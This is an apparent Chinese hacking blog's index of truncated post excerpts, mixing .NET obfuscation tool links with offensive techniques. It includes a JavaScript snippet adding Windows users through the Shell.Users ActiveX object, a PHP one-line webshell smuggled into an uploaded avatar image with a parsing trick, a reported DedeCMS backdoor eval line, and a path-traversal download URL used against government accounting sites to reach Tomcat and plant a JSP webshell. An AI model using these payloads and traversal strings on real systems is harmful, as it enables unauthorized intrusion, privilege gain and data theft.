一.Xenocode
Xenocode Postbuild 2007汉化版
http://blog.csdn.net/luozhuang/archive/2009/10/24/4716606.aspx
二.NetZ(合并Exe,Dll,并混淆代码)
...
- 添加新评论
- 阅读次数:
- 添加新评论
- 阅读次数:
- 添加新评论
- 阅读次数:
- 添加新评论
- 阅读次数:
户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:
js:
var o=new ActiveXObject( "Shell.Users" );
...
- 添加新评论
- 阅读次数:
注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马
<?fputs(fopen(ck.php,w),<?eval($_POST[cmd]);?>)?>
如果文件被成功解析,那就会在图片当前目录生成ck.php里面内容为一句话,密码cmd
上传后得到图片地址,在图片后加上/.php 成功解析,那
- 添加新评论
- 阅读次数:
DedeCMS V5.7 SP1正式版
UTF-8 GBK版本疑似被植入一句话后门shopcar.class.php 被植入一句话
@eval(file_get_contents('php://input'));
- 添加新评论
- 阅读次数:
一批政府会计网使用cms存在任意文件下载漏洞,直接可以下载tomcat配置文件,使用tomcat的管理功能,直接上传war获得jsp webshell,系统权限,直接登录主机(虽然主机修改3389端口为3399,不影响登录)好像是新站点,没有继续测试...
(不知道说明白没有?反正没有太多技术含量)
addcontent/webEditor/upload/files/
file_down.jsp?filename=../../../../../../../../conf/tomcat-
...
- 添加新评论
- 阅读次数:
请输入密码查看文章及评论. 成功输入密码后, 可以直接点击查看文章, 直到关闭浏览器.
此文章需要普通级别密码!
- 添加新评论
- 阅读次数:
请输入密码查看文章及评论. 成功输入密码后, 可以直接点击查看文章, 直到关闭浏览器.
此文章需要普通级别密码!
- 添加新评论
- 阅读次数: